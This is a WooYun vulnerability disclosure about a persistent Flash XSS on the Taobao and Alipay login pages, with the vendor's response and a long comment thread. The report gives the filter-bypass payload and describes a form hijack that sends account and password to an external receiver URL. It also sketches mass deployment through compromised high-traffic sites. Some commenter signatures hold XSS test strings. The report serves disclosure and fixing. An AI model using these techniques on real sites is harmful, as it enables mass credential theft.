当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051615

漏洞标题:一个可大规模悄无声息窃取淘宝/支付宝账号与密码的漏洞 -(埋雷式攻击附带视频演示)

相关厂商:淘宝网

漏洞作者: gainover

提交时间:2014-02-21 16:21

修复时间:2014-04-07 16:22

公开时间:2014-04-07 16:22

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-21: 细节已通知厂商并且等待厂商处理中
2014-02-26: 厂商已经确认,细节仅向厂商公开
2014-03-08: 细节向核心白帽子及相关领域专家公开
2014-03-18: 细节向普通白帽子公开
2014-03-28: 细节向实习白帽子公开
2014-04-07: 细节向公众公开

简要描述:

有些漏洞,如果只是从技术层面来说明问题,厂商似乎感觉不到它的危害。整个漏洞利用过程也录了个视频,奉献给普通网民,厂商努力修,我们网民自己也得增强安全意识,那些抱着“这么大公司不可能有大漏洞”之幻想的网民们该醒醒了。。

详细说明:

1. 此缺陷存在于淘宝网登录页面及支付宝登陆页面。
两个页面的FLASH文件分别为:
淘宝登录页:
https://acjstb.aliyun.com/flash/JSocket.swf
支付宝登陆页
https://acjs.aliyun.com/flash/JSocket.swf
2. 此漏洞已经被报告两次,并在第2次做出了修复。
WooYun: 一个flash的0day导致的淘宝网存储xss(可形成永久后门) 一个flash的0day导致的淘宝网存储xss(可形成永久后门)
WooYun: 一个flash的0day导致的淘宝网存储xss 【续集】 一个flash的0day导致的淘宝网存储xss 【续集】
但随后的不知哪次更新中,FLASH文件代码被再次改写,而改写后的代码,过滤上再次出现问题。(安全与开发没互动啊!!)
缺陷代码如下:

private function getlso():String{
	var _local1:SharedObject = SharedObject.getLocal("kj");
	var _local2:RegExp = new RegExp("[\\({]");
	if (_local1.data.key == undefined){
		return ("");
	};
	if (_local2.test(_local1.data.key)){
		this.setlso("");
		return ("");
	};
	return (_local1.data.key);
}


可以看到,正则表达式 _local2 仅仅过滤了 ( 和 { ,而正确的过滤方法应该是过滤 \ ,这个我用我的小号在 WooYun: 一个flash的0day导致的淘宝网存储xss 【续集】 的修复建议中已经给出该修复建议。
那么为什么这里还是没过滤 \ 呢? 原因猜测可能有两种:
A. 响应漏洞的同学并没看到我的修复建议并转告开发同学。
B. 开发的同学,认为 [\\({] 是 \ , ( 和 } 的集合, 而实际上,RegExp方式创建正则表达式时,需要写成 [\\\\({] ,原因是:\在字符串里是转义符,在正则里也是转义符。
然后, ( 和 { 被过滤后,我们依然可以执行Javascript代码,例如以下代码:

location.href="javascript:alert%28129";


3. 相比之前的帖子,neobytes同学以及我的小号,都未太过于强调此漏洞的危害,neobytes同学得到了8rank,而我的小号索要了8rank,漏洞响应的同学只给了我 5 rank 。。。
对于此,我只想重复我在漏洞简要描述中的那一句话:“有些漏洞,如果只是从技术层面来说明问题,厂商似乎感觉不到它的危害。”
4. 这一次,我要证明这个漏洞的危害有多大。 (由于淘宝和支付宝是一样的问题,这里我仅以支付宝做漏洞危害演示!)
5. 由于以上原因导致产生 FLASH XSS Rookit, 而该FLASH所在的页面是在 淘宝/支付宝的登录页面,换句话说,如果我们的XSS代码是可以监控并记录登录页面上的密码的。说的更直接点,就是利用该 Flash XSS Rookit 来劫持用户登录的表单。
这里我写了一个简单粗糙的代码,来劫持登录表单,劫持表单的代码的解读我就不说了,直接看演示页面:http://xsst.sinaapp.com/taobao_xss_2014_2_20_abc3fd.htm
我们打开演示页面,界面如下,很白痴的界面:

1.jpg


进度条很快就加载完了,这说明我们已经在电脑上种植好了flash xss rookit的代码。
接着,我们打开支付宝的首页: https://www.alipay.com/, 输入帐号和密码
当我们离开密码框时,我们的rookit代码会将用户所输入的密码记录到全局的 ppp 变量中,如下图所示:

2.jpg


接着,应该是点击 【登录】按钮, 而该登录按钮的 点击事件 被我们所劫持,当用户点击登录时,
输入框中的用户名,以及存储在全局变量ppp中的密码将被发送至我们的接收页面。
由于登录页面是https协议,因此我们接受密码的页面也采用 https协议,这里使用的是GAE。
https://jsfile2012.appspot.com/paypalpoc?data=帐号和密码
如下图所示是被发送到我们接受也没的帐号与密码:

3.jpg


随后,登录按钮将会被脚本复原,执行它原本的正常登录功能。可以看到我们正常的登录成功,密码也被记录进入数据库中。

4.jpg


6. 以上是整个窃取密码的过程,为什么说这个漏洞危害大呢?它具有以下特点。
【危害的说明】 见漏洞证明部分
7. 上面我只是演示偷取了我自己的小号,接着我们要回到我们标题上的“大规模”。
当然,我不可能真实的去利用该漏洞偷取很多帐号和密码来证明它,这里只给出一些思路,
而这些思路,对于有心人来说,都是很容易实现的:
A. 入侵一些大流量的网站(或者很多个小流量的站),然后iframe隐蔽嵌入上面的漏洞利用页面。大量受害者访问页面后,电脑被种植flash xss rookit。 当受害者下次使用该电脑登录淘宝或支付宝时,帐号密码被发送给黑客。
B. 利用一些社交网站的XSS来嵌入漏洞利用页面,后面流程与A相同。
C. 可以利用一些看似很正常的页面,例如百度搜索结果中的一些第三方百度应用。
D. 如果是在利用代码中,再混杂一些其他网站的XSS来获取受害者信息,危害将会变得更大,简单的例子,QQ的XSS,获取到QQ帐号,而QQ号所使用密码可能与支付宝或淘宝密码相同。
8. 最后我自己变身为一个受害者,在虚拟机中,将整个受害过程录制成了视频:
注:视频中所使用的被插入恶意代码的网站域名 www.hao456.com 为虚构的假想网站,在本地环境搭建而成。其次,由于录制视频时,网速较慢,部分加载网页的延时部分被后期剪掉了。
在线视频:

清晰版视频下载: http://static.wooyun.org/files/taobaoxss.wmv

漏洞证明:

由于详细说明中已经给出具体的证明过程,这里强调的是该漏洞的一些特点:
A. 可以钓取用户的账户和密码信息,相比传统XSS窃取的个人信息更加重要。
B. 相比传统钓鱼,这种在支付宝和淘宝自己登录页面上的钓鱼,对于用户来说无法用认知来防御。
C. 窃取密码的过程隐蔽,用户难以察觉。
D. 窃取手段不会被目前的家用杀毒软件所察觉。
E. 此类XSS攻击,并不像传统XSS需要用户处于登录态。而是随时都可以进行攻击,从而在受害者电脑上种植rookit代码。因而十分易于用来做定向的攻击或者大规模的攻击。
F. 此类XSS攻击,可以长期存在于用户电脑中,持续时间长。
G. 此类XSS完全是跨协议的,即我们种植rookit使用的是http协议下的flash文件,而登录页面中是https协议下的flash文件。
H. 在chrome浏览器中,普通页面下种植的rookit,在隐身模式下登录支付宝一样会被窃取密码。
I. 支付宝的登录控件,并不能防止通过这种攻击所实施的密码窃取

修复方案:

1. 修复正则过滤 \ 的问题。
2. flash代码中的

Security.allowDomain("*");


修改为

Security.allowDomain("auth.alipay.com","login.taobao.com");



这样一来,就只有 auth.alipay.com 和 login.taobao.com 两个域可以调用flash中addCallback提供的函数接口了。当然这么写要避免 auth.alipay.com 和 login.taobao.com 的域下出现其它XSS漏洞。

综合1和2,可以彻底修复此漏洞。
支付宝网站中使用的FLASH文件不少,说不定其它位置也存在类似问题。
用户解决这种后门(flash)的办法是:

111.png

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-02-26 10:25

厂商回复:

感谢您对阿里巴巴安全的支持

最新状态:

暂无

漏洞评价:

评论

  1. 2014-02-21 16:22 | 剑气如霜 ( 路人 | Rank:2 漏洞数:1 | aaa)

    沙发

  2. 2014-02-21 16:22 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    又5W...

  3. 2014-02-21 16:22 | gskiiny ( 实习白帽子 | Rank:36 漏洞数:16 | 挖着挖着会挖了。)

    前排

  4. 2014-02-21 16:23 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    果然被雷劈了

  5. 2014-02-21 16:23 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    之前的二哥要复活?

  6. 2014-02-21 16:23 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    二哥无敌

  7. 2014-02-21 16:23 | 灰色轨迹 ( 实习白帽子 | Rank:75 漏洞数:21 | )

    吊炸天

  8. 2014-02-21 16:24 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    来mark下

  9. 2014-02-21 16:24 | diguoji ( 普通白帽子 | Rank:323 漏洞数:79 | 中国吉林长春)

    目测又要给钱了,

  10. 2014-02-21 16:25 | Elegance ( 实习白帽子 | Rank:48 漏洞数:3 | 此人很懒,什么话都没留下!)

    估计跟我正想写的那个一样

  11. 2014-02-21 16:25 | rasca1 ( 实习白帽子 | Rank:53 漏洞数:16 | 菜鸟一只)

    五万啊。。。。。。。

  12. 2014-02-21 16:25 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @niliu 明显10W好不好,阿里说最高10W的!

  13. 2014-02-21 16:25 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    二哥又调皮了~~

  14. 2014-02-21 16:25 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @px1624 雷劈double!

  15. 2014-02-21 16:26 | 漫步云端 ( 普通白帽子 | Rank:196 漏洞数:33 | I'm Ramble!)

    mark

  16. 2014-02-21 16:26 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @niliu 嗯,被加精了!

  17. 2014-02-21 16:26 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    阿里就知道吹牛逼,看他给不给5万

  18. 2014-02-21 16:27 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    至少五万!

  19. 2014-02-21 16:27 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Rona 目测GN有钱娶媳妇了!

  20. 2014-02-21 16:27 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    淘宝和支付宝接连不断的出现漏洞,相关的技术人员估计惨惨的了。。前排占座,出售小板凳 瓜子 可乐 饼干

  21. 2014-02-21 16:27 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    妥妥的10W 坐等楼桌摆一桌,请各位白帽子吃饭 ^_^

  22. 2014-02-21 16:28 | 36度半开水 ( 路人 | Rank:2 漏洞数:1 | oye~~~~信息安全小牛忙~~~~ 鸭梨山大亲指继...)

    阿里有的是钱,不就5万嘛

  23. 2014-02-21 16:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Murk Emissary 估计这种漏洞还是危机公关吧,对他们来说,5W 10W只要严重,真没啥的

  24. 2014-02-21 16:28 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    二哥又猥琐了

  25. 2014-02-21 16:28 | xssing ( 路人 | Rank:10 漏洞数:7 | xssing)

    这个要火啊,估计又要忽略了啊

  26. 2014-02-21 16:30 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    占座,吃火锅

  27. 2014-02-21 16:30 | 过客 ( 实习白帽子 | Rank:42 漏洞数:13 )

    二哥要不要这么文艺

  28. 2014-02-21 16:31 | 裙下的秘密 ( 实习白帽子 | Rank:83 漏洞数:9 | )

    碉堡了,嗑瓜子,观看

  29. 2014-02-21 16:31 | daige13 ( 路人 | Rank:0 漏洞数:1 )

    占座

  30. 2014-02-21 16:31 | qwerty ( 普通白帽子 | Rank:116 漏洞数:16 | 已注销)

    500W啊

  31. 2014-02-21 16:31 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    又有大作!

  32. 2014-02-21 16:32 | ‫‌ ( 实习白帽子 | Rank:76 漏洞数:14 )

    二哥复活了,满血。

  33. 2014-02-21 16:32 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @肉肉 什么时候吃!叫上我啊。。。

  34. 2014-02-21 16:33 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

    二哥......

  35. 2014-02-21 16:34 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

  36. 2014-02-21 16:35 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    二哥,你为何这么吊!

  37. 2014-02-21 16:36 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我学到的是埋雷式攻击

  38. 2014-02-21 16:38 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    @xsser 和水坑攻击相对么

  39. 2014-02-21 16:40 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @猪头子 是的啊

  40. 2014-02-21 16:42 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    又来5W了。

  41. 2014-02-21 16:42 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @xsser 我是地毯式的

  42. 2014-02-21 16:43 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    前排卖摔炮

  43. 2014-02-21 16:43 | Demon ( 普通白帽子 | Rank:121 漏洞数:14 | You are my dream)

    mark

  44. 2014-02-21 16:45 | 银狼_avi ( 实习白帽子 | Rank:55 漏洞数:13 | 本屌十二岁破处)

    5W

  45. 2014-02-21 16:46 | wusuopubupt ( 路人 | Rank:3 漏洞数:2 | BUPTer, linux lover.)

    500W

  46. 2014-02-21 16:46 | warren ( 路人 | Rank:4 漏洞数:1 | 努力工作!!!!)

    顶,5W啊。。

  47. 2014-02-21 16:51 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @gainover 导演又出新作了,还拍成了动作片

  48. 2014-02-21 16:54 | OverTime ( 路人 | Rank:1 漏洞数:1 | 一个搞计算机的没啥好介绍的。。。)

    My God 有地雷。。。不会俩王四个2 吧。。。

  49. 2014-02-21 16:56 | 野驴~ ( 路人 | Rank:5 漏洞数:2 | 充满强烈好奇心的菜鸟。)

    10W+走起,苦了阿里安全攻城师了

  50. 2014-02-21 16:57 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    二哥复活了。奖金发了别忘了请客吃饭啊。。

  51. 2014-02-21 16:58 | ovens ( 路人 | Rank:21 漏洞数:3 | 身是菩提树,心如明镜台; 时时勤拂拭,勿...)

    又来5W了

  52. 2014-02-21 16:59 | ゼ羽人 ( 路人 | Rank:15 漏洞数:4 | Forward...)

    又是个5w啊。。

  53. 2014-02-21 17:01 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    @xsser 会不会某第三方出的问题呢?

  54. 2014-02-21 17:01 | xxw ( 路人 | Rank:29 漏洞数:18 | 中国梦)

    乌云这次火了。二哥也火了

  55. 2014-02-21 17:03 | ghy459 ( 实习白帽子 | Rank:62 漏洞数:5 | 深挖洞,广积shell。)

    二哥碉堡!

  56. 2014-02-21 17:09 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    来晚了 mark

  57. 2014-02-21 17:13 | 感悟人生 ( 路人 | Rank:6 漏洞数:3 | 我这个人很懒,什么都没有留下O(∩_∩)O~)

    火了火了。。。。

  58. 2014-02-21 17:14 | 啦绯哥 ( 普通白帽子 | Rank:107 漏洞数:20 )

    来晚了,只能买楼上的瓜子花生看着楼主拿奖了。

  59. 2014-02-21 17:16 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    和水坑攻击的区别是?

  60. 2014-02-21 17:17 | Undoit ( 普通白帽子 | Rank:167 漏洞数:25 | 打酱油)

    碉堡了

  61. 2014-02-21 17:19 | 超级大菜鸟 ( 路人 | Rank:5 漏洞数:3 | <<<<<<<<<<<<<<<<<<<<<<<<________________...)

    mark

  62. 2014-02-21 17:22 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @蟋蟀哥哥 吃饭的时候叫上我啊!!!

  63. 2014-02-21 17:23 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @px1624 叫你的时候喊上我!!!

  64. 2014-02-21 17:24 | terrying ( 实习白帽子 | Rank:59 漏洞数:15 | 雅蠛蝶)

    占座来晚了~

  65. 2014-02-21 17:26 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @niliu 喊你的时候拉上我!!!

  66. 2014-02-21 17:27 | 野驴~ ( 路人 | Rank:5 漏洞数:2 | 充满强烈好奇心的菜鸟。)

    @niliu叫你的时候喊上我!!

  67. 2014-02-21 17:28 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    我只能站着听讲了…………前面吧头第一下,挡着我们后面的了!!

  68. 2014-02-21 17:36 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    壮栽我PKAV

  69. 2014-02-21 17:38 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    我是来蹭饭的!!

  70. 2014-02-21 17:39 | Sevck ( 路人 | Rank:2 漏洞数:2 | 一个乌云RANK为0的脚本小子)

    每次看二哥的漏洞都好NB

  71. 2014-02-21 17:54 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    钱是不指望了,还是我们会莫莫给你点赞的!

  72. 2014-02-21 17:56 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @niliu 你又没在成都!

  73. 2014-02-21 17:59 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    二哥!二哥!

  74. 2014-02-21 18:00 | sql 认证白帽子 ( 核心白帽子 | Rank:1127 漏洞数:145 | 带着两个MM(mysql,mssql),玩3p(asp,php...)

    5w

  75. 2014-02-21 18:22 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    埋雷炸天的节奏!顶二哥

  76. 2014-02-21 18:30 | 宇少 ( 普通白帽子 | Rank:106 漏洞数:41 | Jyhack-TeaM:bbs.jyhack.com 群:308694453...)

    描述:高端大气上档次!

  77. 2014-02-21 18:48 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

    围观

  78. 2014-02-21 18:56 | 鶆鶈 ( 普通白帽子 | Rank:306 漏洞数:30 )

    the white hat rises.

  79. 2014-02-21 19:09 | Huc-Unis ( 普通白帽子 | Rank:1055 漏洞数:292 | 诶,现在通用奖励越来越低了;离买保时捷卡...)

    卧槽~奖励100万

  80. 2014-02-21 19:10 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)

    哇靠,强大

  81. 2014-02-21 19:22 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    牛逼啊

  82. 2014-02-21 19:23 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  83. 2014-02-21 19:31 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    二哥居然没用马甲发。。。

  84. 2014-02-21 19:54 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @px1624 我在首都...

  85. 2014-02-21 19:56 | 脚本菜菜 ( 路人 | Rank:10 漏洞数:4 | 我只是混个邀请码。)

    前排怎么没有整齐的阵容。

  86. 2014-02-21 20:05 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Blackeagle 这种提升知名度的好事情肯定要用大号发啊,哈哈

  87. 2014-02-21 20:20 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    强势回归呀~

  88. 2014-02-21 21:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @带馅儿馒头 馒头什么时候回归

  89. 2014-02-21 21:30 | 高斯 ( 路人 | Rank:16 漏洞数:4 )

    顶二哥!

  90. 2014-02-21 22:45 | 封印师 ( 路人 | Rank:4 漏洞数:3 | 我是小彩笔来的。...(。•ˇ‸ˇ•。) ...)

    卧槽,BOOOOOOOOOOOM!

  91. 2014-02-21 22:54 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    我有预感,二哥肯定要收到N多私信了,,各种求合作、包赚钱、拜师、花钱买详情的。。。@gainover

  92. 2014-02-21 23:35 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    struts2漏洞利用工具的作者,终于见到了!

  93. 2014-02-21 23:57 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    Ooo

  94. 2014-02-22 00:36 | scan_z ( 路人 | Rank:8 漏洞数:4 | /home/work/newsphp/newsroot/temp/smarty/...)

    速来围观!!!!!

  95. 2014-02-22 07:29 | menzhi007 ( 路人 | Rank:4 漏洞数:3 | menzhi007)

    取钱出来吧 被黑产

  96. 2014-02-22 07:53 | eGirlAsm ( 路人 | Rank:22 漏洞数:2 | 其实我就是传说中风流倜傥,英俊潇洒的...屌...)

    预测跟JS有关系.我赌三毛钱。

  97. 2014-02-22 08:38 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    我想看他埋的什么雷

  98. 2014-02-22 08:48 | 核攻击 ( 实习白帽子 | Rank:35 漏洞数:7 | 统治全球,奴役全人类!毁灭任何胆敢阻拦的...)

    土豪!哪里逃!

  99. 2014-02-22 09:12 | 小隐 ( 路人 | Rank:5 漏洞数:1 | 漫漫人生路)

    还好我用的是小公司

  100. 2014-02-22 10:08 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    第100排,出售瓜子,爆米花。

  101. 2014-02-22 10:18 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    马克、。。。

  102. 2014-02-22 10:52 | Defa ( 普通白帽子 | Rank:113 漏洞数:13 | <img src=1 onerror=alert(1)>)

    占楼

  103. 2014-02-22 11:02 | 专注XSS三十年 ( 实习白帽子 | Rank:39 漏洞数:11 | 11)

    卧槽 关注

  104. 2014-02-22 11:49 | CJ也疯狂 ( 路人 | Rank:7 漏洞数:3 | 专业源于专注!踏踏实实走好每一步)

    坐等结果

  105. 2014-02-22 13:05 | 花少也是War ( 路人 | Rank:0 漏洞数:2 | 我是小屁孩)

    做等公开

  106. 2014-02-22 17:49 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    威武霸气了,好羡慕,见见庐山真面目该多好!

  107. 2014-02-22 21:41 | 小权 ( 路人 | Rank:4 漏洞数:3 | 小菜鸟,求各位大姐大哥多多指教)

    二哥碉堡!

  108. 2014-02-22 21:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    年度最受关注漏洞了

  109. 2014-02-22 22:01 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    @xsser 这个可以颁奖了

  110. 2014-02-22 22:27 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    已经火了,那更要留名了,mark

  111. 2014-02-23 09:03 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    为毛还不来确认!!!难道二哥拿到钱了??

  112. 2014-02-23 09:08 | Anymous ( 普通白帽子 | Rank:124 漏洞数:28 )

    @xsser 貌似我看到了月报的内容了这个阿里不会忽略吧

  113. 2014-02-23 09:53 | 川川 ( 实习白帽子 | Rank:68 漏洞数:28 | 今天我刷屏)

    我信二哥,求忽略,求公开

  114. 2014-02-23 18:41 | Elegance ( 实习白帽子 | Rank:48 漏洞数:3 | 此人很懒,什么话都没留下!)

    看二哥的那段描述,我总有种不安!我想看的是你淫荡的思路!

  115. 2014-02-23 20:29 | 网路游侠 ( 路人 | Rank:20 漏洞数:2 | 不玩渗透好多年……)

    5万到10万啊,土豪,我们可以认识吗?!

  116. 2014-02-24 09:06 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @zzR 卖汽水,瓜子吗?

  117. 2014-02-24 09:38 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @Mr.leo 专业卖摔炮,谢谢-0-

  118. 2014-02-24 09:38 | 笨小猪 ( 路人 | Rank:16 漏洞数:2 | 杯壁下流)

    我有预感,二哥肯定要收到N多私信了,,各种求合作、包赚钱、拜师、花钱买详情的。。。@gainover

  119. 2014-02-24 20:47 | doosit ( 路人 | Rank:18 漏洞数:4 | 木有介绍。)

    又一个 5W啊

  120. 2014-02-24 22:59 | neobyte ( 普通白帽子 | Rank:117 漏洞数:11 )

    看到埋雷这个词,突然有一种预感。。。会是我刚看到的那个么

  121. 2014-02-24 23:39 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @neobyte 回来了啊?

  122. 2014-02-25 09:47 | il0vnn ( 路人 | Rank:29 漏洞数:12 | 这个人那个人)

    包夜不二价

  123. 2014-02-25 11:42 | open ( 实习白帽子 | Rank:31 漏洞数:5 | ;alert('robert');//)

    厂商不确认是啥意思

  124. 2014-02-25 11:54 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @open 目测再不确认就要公开了。。。

  125. 2014-02-25 12:19 | Elegance ( 实习白帽子 | Rank:48 漏洞数:3 | 此人很懒,什么话都没留下!)

    应急平台也是,这几天都没响应

  126. 2014-02-25 17:46 | neobyte ( 普通白帽子 | Rank:117 漏洞数:11 )

    @xsser 嗯,一直都在

  127. 2014-02-26 11:02 | Walle ( 路人 | Rank:0 漏洞数:5 | ... 位卑、未敢忘忧国! ...)

    牛逼啊、、、、、

  128. 2014-02-26 12:30 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    感谢您对阿里巴巴的支持!我们将奖励@gainover 5万元人民币作为回报!

  129. 2014-02-26 15:54 | j0phy ( 路人 | Rank:26 漏洞数:4 | Bloger & Scanner & Optimist)

    坐等公开如何得到五万的

  130. 2014-02-26 17:33 | daige13 ( 路人 | Rank:0 漏洞数:1 )

    看来是不会公开了。

  131. 2014-02-26 18:26 | 火星梅梅 ( 路人 | Rank:20 漏洞数:2 | 做游戏的苦逼屌丝一枚!)

    五万呢?15rank啊,应该给钱了!

  132. 2014-02-26 18:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @火星梅梅 你的五万被银行收回去没啊 我好关心啊

  133. 2014-02-26 18:31 | 火星梅梅 ( 路人 | Rank:20 漏洞数:2 | 做游戏的苦逼屌丝一枚!)

    @xsser 你多关心你自己的主页吧,这么好的域名老不更新,白瞎了!

  134. 2014-02-26 18:33 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @火星梅梅 @_@

  135. 2014-02-27 18:53 | 无尾熊 ( 路人 | Rank:14 漏洞数:2 | 菜鸟一枚。。。学习安全技术中。 。。)

    膜拜。。。

  136. 2014-02-27 19:20 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    好久没来乌云了。看见二哥了,果断进来拜拜~~【2哥保佑我,明天拿下百度】

  137. 2014-02-28 14:34 | xs0x00 ( 路人 | Rank:2 漏洞数:2 | 闭关中...)

    Mark

  138. 2014-03-10 10:18 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    果然很高大上!!

  139. 2014-03-10 11:47 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    淘宝的SQA人员和信息安全人员估计这个月奖金有没了 ....

  140. 2014-03-10 17:18 | 脚本菜菜 ( 路人 | Rank:10 漏洞数:4 | 我只是混个邀请码。)

    没有乌云币。看不了。好期待

  141. 2014-03-11 11:06 | 404 ( 路人 | Rank:20 漏洞数:4 )

    楼上都是逗逼,鉴定完毕。

  142. 2014-03-13 10:02 | 核攻击 ( 实习白帽子 | Rank:35 漏洞数:7 | 统治全球,奴役全人类!毁灭任何胆敢阻拦的...)

    。。。。。。

  143. 2014-03-14 17:59 | 混世魔王 ( 路人 | Rank:26 漏洞数:5 | 欢迎友情链接http://26836659.blogcn.com)

    利用第一次访问劫持,修改阿里的 FALSH CS. 带有XSS 功能。这样,你再一次访问的时候,调用本地的 cookie 的FLASH,就会触发 XSS。登陆,就被劫持了。

  144. 2014-03-14 18:11 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    楼上真相?

